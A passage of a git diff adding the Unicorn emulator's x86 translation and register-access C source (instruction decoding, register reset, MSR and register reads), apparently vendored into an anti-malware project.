CC_OP_EFLAGS); + break; + case 0x10e: case 0x10f: + /* 3DNow! instructions, ignore prefixes */ + s->prefix &= ~(PREFIX_REPZ | PREFIX_REPNZ | PREFIX_DATA); + case 0x110: case 0x111: case 0x112: case 0x113: case 0x114: case 0x115: case 0x116: case 0x117: //case 0x110 ... 0x117: + case 0x128: case 0x129: case 0x12a: case 0x12b: case 0x12c: case 0x12d: case 0x12e: case 0x12f: //case 0x128 ... 0x12f: + case 0x138: case 0x139: case 0x13a: + // case 0x150 ... 0x179: + case 0x150: case 0x151: case 0x152: case 0x153: case 0x154: case 0x155: case 0x156: case 0x157: + case 0x158: case 0x159: case 0x15a: case 0x15b: case 0x15c: case 0x15d: case 0x15e: case 0x15f: + case 0x160: case 0x161: case 0x162: case 0x163: case 0x164: case 0x165: case 0x166: case 0x167: + case 0x168: case 0x169: case 0x16a: case 0x16b: case 0x16c: case 0x16d: case 0x16e: case 0x16f: + case 0x170: case 0x171: case 0x172: case 0x173: case 0x174: case 0x175: case 0x176: case 0x177: + case 0x178: case 0x179: + // case 0x17c ... 0x17f: + case 0x17c: case 0x17d: case 0x17e: case 0x17f: + case 0x1c2: + case 0x1c4: case 0x1c5: case 0x1c6: + //case 0x1d0 ... 0x1fe: + case 0x1d0: case 0x1d1: case 0x1d2: case 0x1d3: case 0x1d4: case 0x1d5: case 0x1d6: case 0x1d7: + case 0x1d8: case 0x1d9: case 0x1da: case 0x1db: case 0x1dc: case 0x1dd: case 0x1de: case 0x1df: + case 0x1e0: case 0x1e1: case 0x1e2: case 0x1e3: case 0x1e4: case 0x1e5: case 0x1e6: case 0x1e7: + case 0x1e8: case 0x1e9: case 0x1ea: case 0x1eb: case 0x1ec: case 0x1ed: case 0x1ee: case 0x1ef: + case 0x1f0: case 0x1f1: case 0x1f2: case 0x1f3: case 0x1f4: case 0x1f5: case 0x1f6: case 0x1f7: + case 0x1f8: case 0x1f9: case 0x1fa: case 0x1fb: case 0x1fc: case 0x1fd: case 0x1fe: + gen_sse(env, s, b, pc_start, rex_r); + break; + default: + goto illegal_op; + } + /* lock generation */ + if (s->prefix & PREFIX_LOCK) + gen_helper_unlock(tcg_ctx, cpu_env); + + // Unicorn: patch the callback for the instruction size + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, pc_start)) { + // int i; + // for(i = 0; i < 20; i++) + // printf("=== [%u] = %x\n", i, *(save_opparam_ptr + i)); + // printf("\n"); + if (changed_cc_op) { + if (cc_op_dirty) +#if TCG_TARGET_REG_BITS == 32 + *(save_opparam_ptr + 16) = s->pc - pc_start; + else + *(save_opparam_ptr + 14) = s->pc - pc_start; +#else + *(save_opparam_ptr + 12) = s->pc - pc_start; + else + *(save_opparam_ptr + 10) = s->pc - pc_start; +#endif + } else { + *(save_opparam_ptr + 1) = s->pc - pc_start; + } + } + + return s->pc; + illegal_op: + if (s->prefix & PREFIX_LOCK) + gen_helper_unlock(tcg_ctx, cpu_env); + /* XXX: ensure that no lock was generated */ + gen_exception(s, EXCP06_ILLOP, pc_start - s->cs_base); + return s->pc; +} + +void optimize_flags_init(struct uc_struct *uc) +{ + static const char reg_names[CPU_NB_REGS][4] = { +#ifdef TARGET_X86_64 + "rax", + "rcx", + "rdx", + "rbx", + "rsp", + "rbp", + "rsi", + "rdi", + "r8", + "r9", + "r10", + "r11", + "r12", + "r13", + "r14", + "r15", +#else + "eax", + "ecx", + "edx", + "ebx", + "esp", + "ebp", + "esi", + "edi", +#endif + }; + int i; + TCGContext *tcg_ctx = uc->tcg_ctx; + + tcg_ctx->cpu_env = tcg_global_reg_new_ptr(uc->tcg_ctx, TCG_AREG0, "env"); + tcg_ctx->cpu_cc_op = tcg_global_mem_new_i32(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUX86State, cc_op), "cc_op"); + tcg_ctx->cpu_cc_dst = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_dst) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUX86State, cc_dst), "cc_dst"); + + tcg_ctx->cpu_cc_src = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_src) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUX86State, cc_src), "cc_src"); + + tcg_ctx->cpu_cc_src2 = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_src2) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUX86State, cc_src2), "cc_src2"); + + for (i = 0; i < CPU_NB_REGS; ++i) { + tcg_ctx->cpu_regs[i] = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_regs[i]) = tcg_global_mem_new(uc->tcg_ctx, TCG_AREG0, + offsetof(CPUX86State, regs[i]), + reg_names[i]); + } +} + +/* generate intermediate code in gen_opc_buf and gen_opparam_buf for + basic block 'tb'. If search_pc is TRUE, also generate PC + information for each intermediate instruction. */ +static inline void gen_intermediate_code_internal(uint8_t *gen_opc_cc_op, + X86CPU *cpu, + TranslationBlock *tb, + bool search_pc) +{ + CPUState *cs = CPU(cpu); + CPUX86State *env = &cpu->env; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + DisasContext dc1, *dc = &dc1; + target_ulong pc_ptr; + uint16_t *gen_opc_end; + CPUBreakpoint *bp; + int j; + int lj = -1; + uint64_t flags; + target_ulong pc_start; + target_ulong cs_base; + int num_insns = 0; + int max_insns; + bool block_full = false; + + /* generate intermediate code */ + pc_start = tb->pc; + cs_base = tb->cs_base; + flags = tb->flags; + + dc->uc = env->uc; + dc->pe = (flags >> HF_PE_SHIFT) & 1; + dc->code32 = (flags >> HF_CS32_SHIFT) & 1; + dc->ss32 = (flags >> HF_SS32_SHIFT) & 1; + dc->addseg = (flags >> HF_ADDSEG_SHIFT) & 1; + dc->f_st = 0; + dc->vm86 = (flags >> VM_SHIFT) & 1; + dc->cpl = (flags >> HF_CPL_SHIFT) & 3; + dc->iopl = (flags >> IOPL_SHIFT) & 3; + dc->tf = (flags >> TF_SHIFT) & 1; + dc->singlestep_enabled = cs->singlestep_enabled; + dc->last_cc_op = dc->cc_op = CC_OP_DYNAMIC; + dc->cc_op_dirty = false; + dc->cs_base = cs_base; + dc->tb = tb; + dc->popl_esp_hack = 0; + /* select memory access functions */ + dc->mem_index = 0; + if (flags & HF_SOFTMMU_MASK) { + dc->mem_index = cpu_mmu_index(env); + } + dc->cpuid_features = env->features[FEAT_1_EDX]; + dc->cpuid_ext_features = env->features[FEAT_1_ECX]; + dc->cpuid_ext2_features = env->features[FEAT_8000_0001_EDX]; + dc->cpuid_ext3_features = env->features[FEAT_8000_0001_ECX]; + dc->cpuid_7_0_ebx_features = env->features[FEAT_7_0_EBX]; +#ifdef TARGET_X86_64 + dc->lma = (flags >> HF_LMA_SHIFT) & 1; + dc->code64 = (flags >> HF_CS64_SHIFT) & 1; +#endif + dc->flags = flags; + dc->jmp_opt = !(dc->tf || cs->singlestep_enabled || + (flags & HF_INHIBIT_IRQ_MASK) +#ifndef CONFIG_SOFTMMU + || (flags & HF_SOFTMMU_MASK) +#endif + ); +#if 0 + /* check addseg logic */ + if (!dc->addseg && (dc->vm86 || !dc->pe || !dc->code32)) + printf("ERROR addseg\n"); +#endif + + if (!env->uc->init_tcg) + tcg_ctx->cpu_T[0] = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_T[0] = tcg_temp_new(tcg_ctx); + + if (!env->uc->init_tcg) + tcg_ctx->cpu_T[1] = g_malloc0(sizeof(TCGv)); + *(TCGv *)tcg_ctx->cpu_T[1] = tcg_temp_new(tcg_ctx); + + if (!env->uc->init_tcg) + tcg_ctx->cpu_A0 = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_A0) = tcg_temp_new(tcg_ctx); + + if (!env->uc->init_tcg) + tcg_ctx->cpu_tmp0 = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_tmp0) = tcg_temp_new(tcg_ctx); + + if (!env->uc->init_tcg) + tcg_ctx->cpu_tmp4 = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_tmp4) = tcg_temp_new(tcg_ctx); + + tcg_ctx->cpu_tmp1_i64 = tcg_temp_new_i64(tcg_ctx); + tcg_ctx->cpu_tmp2_i32 = tcg_temp_new_i32(tcg_ctx); + tcg_ctx->cpu_tmp3_i32 = tcg_temp_new_i32(tcg_ctx); + tcg_ctx->cpu_ptr0 = tcg_temp_new_ptr(tcg_ctx); + tcg_ctx->cpu_ptr1 = tcg_temp_new_ptr(tcg_ctx); + + if (!env->uc->init_tcg) + tcg_ctx->cpu_cc_srcT = g_malloc0(sizeof(TCGv)); + *((TCGv *)tcg_ctx->cpu_cc_srcT) = tcg_temp_local_new(tcg_ctx); + + // done with initializing TCG variables + env->uc->init_tcg = true; + + pc_ptr = pc_start; + + // early check to see if the address of this block is the until address + if (tb->pc == env->uc->addr_end) { + // imitate the HLT instruction + gen_tb_start(tcg_ctx); + gen_jmp_im(dc, tb->pc - tb->cs_base); + gen_helper_hlt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, 0)); + dc->is_jmp = DISAS_TB_JUMP; + goto done_generating; + } + + gen_opc_end = tcg_ctx->gen_opc_buf + OPC_MAX_SIZE; + + dc->is_jmp = DISAS_NEXT; + max_insns = tb->cflags & CF_COUNT_MASK; + if (max_insns == 0) + max_insns = CF_COUNT_MASK; + + // Unicorn: trace this block on request + // Only hook this block if the previous block was not truncated due to space + if (!env->uc->block_full && HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_BLOCK, pc_start)) { + env->uc->block_addr = pc_start; + env->uc->size_arg = tcg_ctx->gen_opparam_buf - tcg_ctx->gen_opparam_ptr + 1; + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_BLOCK_IDX, env->uc, pc_start); + } else { + env->uc->size_arg = -1; + } + + gen_tb_start(tcg_ctx); + for(;;) { + if (unlikely(!QTAILQ_EMPTY(&cs->breakpoints))) { + QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { + if (bp->pc == pc_ptr && + !((bp->flags & BP_CPU) && (tb->flags & HF_RF_MASK))) { + gen_debug(dc, pc_ptr - dc->cs_base); + goto done_generating; + } + } + } + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + if (lj < j) { + lj++; + while (lj < j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + tcg_ctx->gen_opc_pc[lj] = pc_ptr; + gen_opc_cc_op[lj] = dc->cc_op; + tcg_ctx->gen_opc_instr_start[lj] = 1; + // tcg_ctx->gen_opc_icount[lj] = num_insns; + } + //if (num_insns + 1 == max_insns && (tb->cflags & CF_LAST_IO)) + // gen_io_start(); + + // Unicorn: save current PC address to sync EIP + dc->prev_pc = pc_ptr; + pc_ptr = disas_insn(env, dc, pc_ptr); + num_insns++; + /* stop translation if indicated */ + if (dc->is_jmp) + break; + /* if single step mode, we generate only one instruction and + generate an exception */ + /* if irq were inhibited with HF_INHIBIT_IRQ_MASK, we clear + the flag and abort the translation to give the irqs a + change to be happen */ + if (dc->tf || dc->singlestep_enabled || + (flags & HF_INHIBIT_IRQ_MASK)) { + gen_jmp_im(dc, pc_ptr - dc->cs_base); + gen_eob(dc); + break; + } + /* if too long translation, stop generation too */ + if (tcg_ctx->gen_opc_ptr >= gen_opc_end || + (pc_ptr - pc_start) >= (TARGET_PAGE_SIZE - 32) || + num_insns >= max_insns) { + gen_jmp_im(dc, pc_ptr - dc->cs_base); + gen_eob(dc); + block_full = true; + break; + } + } + //if (tb->cflags & CF_LAST_IO) + // gen_io_end(); +done_generating: + gen_tb_end(tcg_ctx, tb, num_insns); + *tcg_ctx->gen_opc_ptr = INDEX_op_end; + /* we don't forget to fill the last values */ + if (search_pc) { + j = tcg_ctx->gen_opc_ptr - tcg_ctx->gen_opc_buf; + lj++; + while (lj <= j) + tcg_ctx->gen_opc_instr_start[lj++] = 0; + } + + if (!search_pc) { + tb->size = pc_ptr - pc_start; + } + + env->uc->block_full = block_full; +} + +void gen_intermediate_code(CPUX86State *env, TranslationBlock *tb) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + gen_intermediate_code_internal(tcg_ctx->gen_opc_cc_op, + x86_env_get_cpu(env), tb, false); +} + +void gen_intermediate_code_pc(CPUX86State *env, TranslationBlock *tb) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + gen_intermediate_code_internal(tcg_ctx->gen_opc_cc_op, + x86_env_get_cpu(env), tb, true); +} + +void restore_state_to_opc(CPUX86State *env, TranslationBlock *tb, int pc_pos) +{ + int cc_op; + TCGContext *tcg_ctx = env->uc->tcg_ctx; + env->eip = tcg_ctx->gen_opc_pc[pc_pos] - tb->cs_base; + cc_op = tcg_ctx->gen_opc_cc_op[pc_pos]; + if (cc_op != CC_OP_DYNAMIC) + env->cc_op = cc_op; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.c new file mode 100644 index 0000000..9ab5dd2 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/unicorn.c @@ -0,0 +1,1528 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015 */ + +#include "hw/boards.h" +#include "hw/i386/pc.h" +#include "sysemu/cpus.h" +#include "unicorn.h" +#include "cpu.h" +#include "tcg.h" +#include "unicorn_common.h" +#include /* needed for uc_x86_mmr */ +#include "uc_priv.h" + +#define FPST(n) (X86_CPU(uc, mycpu)->env.fpregs[(X86_CPU(uc, mycpu)->env.fpstt + (n)) & 7].d) + +#define X86_NON_CS_FLAGS (DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK) +static void load_seg_16_helper(CPUX86State *env, int seg, uint32_t selector) +{ + cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, X86_NON_CS_FLAGS); +} + + +extern void helper_wrmsr(CPUX86State *env); +extern void helper_rdmsr(CPUX86State *env); + +const int X86_REGS_STORAGE_SIZE = offsetof(CPUX86State, tlb_table); + +static void x86_set_pc(struct uc_struct *uc, uint64_t address) +{ + CPUState* cpu = uc->cpu; + int16_t cs = (uint16_t)X86_CPU(uc, cpu)->env.segs[R_CS].selector; + if(uc->mode == UC_MODE_16) + ((CPUX86State *)uc->current_cpu->env_ptr)->eip = address - cs*16; + else + ((CPUX86State *)uc->current_cpu->env_ptr)->eip = address; +} + +void x86_release(void *ctx); + +void x86_release(void *ctx) +{ + int i; + TCGContext *s = (TCGContext *) ctx; + + cpu_breakpoint_remove_all(s->uc->cpu, BP_CPU); + + release_common(ctx); + + // arch specific + g_free(s->cpu_A0); + g_free(s->cpu_T[0]); + g_free(s->cpu_T[1]); + g_free(s->cpu_tmp0); + g_free(s->cpu_tmp4); + g_free(s->cpu_cc_srcT); + g_free(s->cpu_cc_dst); + g_free(s->cpu_cc_src); + g_free(s->cpu_cc_src2); + + for (i = 0; i < CPU_NB_REGS; ++i) { + g_free(s->cpu_regs[i]); + } + + g_free(s->tb_ctx.tbs); +} + +void x86_reg_reset(struct uc_struct *uc) +{ + CPUArchState *env = uc->cpu->env_ptr; + + env->features[FEAT_1_EDX] = CPUID_CX8 | CPUID_CMOV | CPUID_SSE2 | CPUID_FXSR | CPUID_SSE | CPUID_CLFLUSH; + env->features[FEAT_1_ECX] = CPUID_EXT_SSSE3 | CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_AES | CPUID_EXT_CX16; + env->features[FEAT_8000_0001_EDX] = CPUID_EXT2_3DNOW | CPUID_EXT2_RDTSCP; + env->features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_ABM | CPUID_EXT3_SKINIT | CPUID_EXT3_CR8LEG; + env->features[FEAT_7_0_EBX] = CPUID_7_0_EBX_BMI1 | CPUID_7_0_EBX_BMI2 | CPUID_7_0_EBX_ADX | CPUID_7_0_EBX_SMAP; + + memset(env->regs, 0, sizeof(env->regs)); + memset(env->segs, 0, sizeof(env->segs)); + memset(env->cr, 0, sizeof(env->cr)); + + memset(&env->ldt, 0, sizeof(env->ldt)); + memset(&env->gdt, 0, sizeof(env->gdt)); + memset(&env->tr, 0, sizeof(env->tr)); + memset(&env->idt, 0, sizeof(env->idt)); + + env->eip = 0; + env->eflags = 0; + env->eflags0 = 0; + env->cc_op = CC_OP_EFLAGS; + + env->fpstt = 0; /* top of stack index */ + env->fpus = 0; + env->fpuc = 0; + memset(env->fptags, 0, sizeof(env->fptags)); /* 0 = valid, 1 = empty */ + + env->mxcsr = 0; + memset(env->xmm_regs, 0, sizeof(env->xmm_regs)); + memset(&env->xmm_t0, 0, sizeof(env->xmm_t0)); + memset(&env->mmx_t0, 0, sizeof(env->mmx_t0)); + + memset(env->ymmh_regs, 0, sizeof(env->ymmh_regs)); + + memset(env->opmask_regs, 0, sizeof(env->opmask_regs)); + memset(env->zmmh_regs, 0, sizeof(env->zmmh_regs)); + + /* sysenter registers */ + env->sysenter_cs = 0; + env->sysenter_esp = 0; + env->sysenter_eip = 0; + env->efer = 0; + env->star = 0; + + env->vm_hsave = 0; + + env->tsc = 0; + env->tsc_adjust = 0; + env->tsc_deadline = 0; + + env->mcg_status = 0; + env->msr_ia32_misc_enable = 0; + env->msr_ia32_feature_control = 0; + + env->msr_fixed_ctr_ctrl = 0; + env->msr_global_ctrl = 0; + env->msr_global_status = 0; + env->msr_global_ovf_ctrl = 0; + memset(env->msr_fixed_counters, 0, sizeof(env->msr_fixed_counters)); + memset(env->msr_gp_counters, 0, sizeof(env->msr_gp_counters)); + memset(env->msr_gp_evtsel, 0, sizeof(env->msr_gp_evtsel)); + +#ifdef TARGET_X86_64 + memset(env->hi16_zmm_regs, 0, sizeof(env->hi16_zmm_regs)); + env->lstar = 0; + env->cstar = 0; + env->fmask = 0; + env->kernelgsbase = 0; +#endif + + // TODO: reset other registers in CPUX86State qemu/target-i386/cpu.h + + // properly initialize internal setup for each mode + switch(uc->mode) { + default: + break; + case UC_MODE_16: + env->hflags = 0; + env->cr[0] = 0; + //undo the damage done by the memset of env->segs above + //for R_CS, not quite the same as x86_cpu_reset + cpu_x86_load_seg_cache(env, R_CS, 0, 0, 0xffff, + DESC_P_MASK | DESC_S_MASK | DESC_CS_MASK | + DESC_R_MASK | DESC_A_MASK); + //remainder yields same state as x86_cpu_reset + load_seg_16_helper(env, R_DS, 0); + load_seg_16_helper(env, R_ES, 0); + load_seg_16_helper(env, R_SS, 0); + load_seg_16_helper(env, R_FS, 0); + load_seg_16_helper(env, R_GS, 0); + + break; + case UC_MODE_32: + env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_OSFXSR_MASK; + cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode + break; + case UC_MODE_64: + env->hflags |= HF_CS32_MASK | HF_SS32_MASK | HF_CS64_MASK | HF_LMA_MASK | HF_OSFXSR_MASK; + env->hflags &= ~(HF_ADDSEG_MASK); + env->efer |= MSR_EFER_LMA | MSR_EFER_LME; // extended mode activated + cpu_x86_update_cr0(env, CR0_PE_MASK); // protected mode + /* If we are operating in 64bit mode then add the Long Mode flag + * to the CPUID feature flag + */ + env->features[FEAT_8000_0001_EDX] |= CPUID_EXT2_LM; + break; + } +} + +static int x86_msr_read(struct uc_struct *uc, uc_x86_msr *msr) +{ + CPUX86State *env = (CPUX86State *)uc->cpu->env_ptr; + uint64_t ecx = env->regs[R_ECX]; + uint64_t eax = env->regs[R_EAX]; + uint64_t edx = env->regs[R_EDX]; + + env->regs[R_ECX] = msr->rid; + helper_rdmsr(env); + + msr->value = ((uint32_t)env->regs[R_EAX]) | + ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); + + env->regs[R_EAX] = eax; + env->regs[R_ECX] = ecx; + env->regs[R_EDX] = edx; + + /* The implementation doesn't throw exception or return an error if there is one, so + * we will return 0. */ + return 0; +} + +static int x86_msr_write(struct uc_struct *uc, uc_x86_msr *msr) +{ + CPUX86State *env = (CPUX86State *)uc->cpu->env_ptr; + uint64_t ecx = env->regs[R_ECX]; + uint64_t eax = env->regs[R_EAX]; + uint64_t edx = env->regs[R_EDX]; + + env->regs[R_ECX] = msr->rid; + env->regs[R_EAX] = (unsigned int)msr->value; + env->regs[R_EDX] = (unsigned int)(msr->value >> 32); + helper_wrmsr(env); + + env->regs[R_ECX] = ecx; + env->regs[R_EAX] = eax; + env->regs[R_EDX] = edx; + + /* The implementation doesn't throw exception or return an error if there is one, so + * we will return 0. */ + return 0; +} + +int x86_reg_read(struct uc_struct *uc, unsigned int *regs, void **vals, int count) +{ + CPUState *mycpu = uc->cpu; + int i; + + for (i = 0; i < count; i++) { + unsigned int regid = regs[i]; + void *value = vals[i]; + switch(regid) { + default: + break; + case UC_X86_REG_FP0: + case UC_X86_REG_FP1: + case UC_X86_REG_FP2: + case UC_X86_REG_FP3: + case UC_X86_REG_FP4: + case UC_X86_REG_FP5: + case UC_X86_REG_FP6: + case UC_X86_REG_FP7: + { + floatx80 reg = X86_CPU(uc, mycpu)->env.fpregs[regid - UC_X86_REG_FP0].d; + cpu_get_fp80(value, (uint16_t*)((char*)value+sizeof(uint64_t)), reg); + } + continue; + case UC_X86_REG_FPSW: + { + uint16_t fpus = X86_CPU(uc, mycpu)->env.fpus; + fpus = fpus & ~0x3800; + fpus |= ( X86_CPU(uc, mycpu)->env.fpstt & 0x7 ) << 11; + *(uint16_t*) value = fpus; + } + continue; + case UC_X86_REG_FPCW: + *(uint16_t*) value = X86_CPU(uc, mycpu)->env.fpuc; + continue; + case UC_X86_REG_FPTAG: + { + #define EXPD(fp) (fp.l.upper & 0x7fff) + #define MANTD(fp) (fp.l.lower) + #define MAXEXPD 0x7fff + int fptag, exp, i; + uint64_t mant; + CPU_LDoubleU tmp; + fptag = 0; + for (i = 7; i >= 0; i--) { + fptag <<= 2; + if (X86_CPU(uc, mycpu)->env.fptags[i]) { + fptag |= 3; + } else { + tmp.d = X86_CPU(uc, mycpu)->env.fpregs[i].d; + exp = EXPD(tmp); + mant = MANTD(tmp); + if (exp == 0 && mant == 0) { + /* zero */ + fptag |= 1; + } else if (exp == 0 || exp == MAXEXPD + || (mant & (1LL << 63)) == 0) { + /* NaNs, infinity, denormal */ + fptag |= 2; + } + } + } + *(uint16_t*) value = fptag; + } + continue; + case UC_X86_REG_XMM0: + case UC_X86_REG_XMM1: + case UC_X86_REG_XMM2: + case UC_X86_REG_XMM3: + case UC_X86_REG_XMM4: + case UC_X86_REG_XMM5: + case UC_X86_REG_XMM6: + case UC_X86_REG_XMM7: + { + float64 *dst = (float64*)value; + XMMReg *reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_XMM0]; + dst[0] = reg->_d[0]; + dst[1] = reg->_d[1]; + continue; + } + case UC_X86_REG_ST0: + case UC_X86_REG_ST1: + case UC_X86_REG_ST2: + case UC_X86_REG_ST3: + case UC_X86_REG_ST4: + case UC_X86_REG_ST5: + case UC_X86_REG_ST6: + case UC_X86_REG_ST7: + { + // value must be big enough to keep 80 bits (10 bytes) + memcpy(value, &FPST(regid - UC_X86_REG_ST0), 10); + continue; + } + case UC_X86_REG_YMM0: + case UC_X86_REG_YMM1: + case UC_X86_REG_YMM2: + case UC_X86_REG_YMM3: + case UC_X86_REG_YMM4: + case UC_X86_REG_YMM5: + case UC_X86_REG_YMM6: + case UC_X86_REG_YMM7: + case UC_X86_REG_YMM8: + case UC_X86_REG_YMM9: + case UC_X86_REG_YMM10: + case UC_X86_REG_YMM11: + case UC_X86_REG_YMM12: + case UC_X86_REG_YMM13: + case UC_X86_REG_YMM14: + case UC_X86_REG_YMM15: + { + float64 *dst = (float64*)value; + XMMReg *lo_reg = &X86_CPU(uc, mycpu)->env.xmm_regs[regid - UC_X86_REG_YMM0]; + XMMReg *hi_reg = &X86_CPU(uc, mycpu)->env.ymmh_regs[regid - UC_X86_REG_YMM0]; + dst[0] = lo_reg->_d[0]; + dst[1] = lo_reg->_d[1]; + dst[2] = hi_reg->_d[0]; + dst[3] = hi_reg->_d[1]; + continue; + } + } + + switch(uc->mode) { + default: + break; + case UC_MODE_16: + switch(regid) { + default: break; + case UC_X86_REG_ES: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_ES].selector; + continue; + case UC_X86_REG_SS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_SS].selector; + continue; + case UC_X86_REG_DS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_DS].selector; + continue; + case UC_X86_REG_FS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_FS].selector; + continue; + case UC_X86_REG_GS: + *(int16_t *)value = X86_CPU(uc, mycpu)->env.segs[R_GS].selector; + continue; + case UC_X86_REG_FS_BASE: + *(uint32_t *)value = (uint32_t)X86_CPU(uc, mycpu)->env.segs[R_FS].base; + continue; + } + // fall-thru + case UC_MODE_32: + switch(regid) { + default: + break; + case UC_X86_REG_CR0: + case UC_X86_REG_CR1: + case UC_X86_REG_CR2: + case UC_X86_REG_CR3: + case UC_X86_REG_CR4: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.cr[regid - UC_X86_REG_CR0]; + break; + case UC_X86_REG_DR0: + case UC_X86_REG_DR1: + case UC_X86_REG_DR2: + case UC_X86_REG_DR3: + case UC_X86_REG_DR4: + case UC_X86_REG_DR5: + case UC_X86_REG_DR6: + case UC_X86_REG_DR7: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.dr[regid - UC_X86_REG_DR0]; + break; + case UC_X86_REG_EFLAGS: + *(int32_t *)value = cpu_compute_eflags(&X86_CPU(uc, mycpu)->env); + break; + case UC_X86_REG_EAX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EAX]; + break; + case UC_X86_REG_AX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_AL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EAX]); + break; + case UC_X86_REG_EBX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBX]; + break; + case UC_X86_REG_BX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_BL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EBX]); + break; + case UC_X86_REG_ECX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ECX]; + break; + case UC_X86_REG_CX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_CL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_ECX]); + break; + case UC_X86_REG_EDX: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDX]; + break; + case UC_X86_REG_DX: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DH: + *(int8_t *)value = READ_BYTE_H(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_DL: + *(int8_t *)value = READ_BYTE_L(X86_CPU(uc, mycpu)->env.regs[R_EDX]); + break; + case UC_X86_REG_ESP: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESP]; + break; + case UC_X86_REG_SP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESP]); + break; + case UC_X86_REG_EBP: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EBP]; + break; + case UC_X86_REG_BP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EBP]); + break; + case UC_X86_REG_ESI: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_ESI]; + break; + case UC_X86_REG_SI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_ESI]); + break; + case UC_X86_REG_EDI: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.regs[R_EDI]; + break; + case UC_X86_REG_DI: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.regs[R_EDI]); + break; + case UC_X86_REG_EIP: + *(int32_t *)value = X86_CPU(uc, mycpu)->env.eip; + break; + case UC_X86_REG_IP: + *(int16_t *)value = READ_WORD(X86_CPU(uc, mycpu)->env.eip); + break; + case UC_X86_REG_CS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_CS].selector; + break; + case UC_X86_REG_DS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_DS].selector; + break; + case UC_X86_REG_SS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_SS].selector; + break; + case UC_X86_REG_ES: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_ES].selector; + break; + case UC_X86_REG_FS: + *(int16_t *)value = (uint16_t)X86_CPU(uc, mycpu)->env.segs[R_FS].selector; + break; + case UC_X86_REG_GS: + 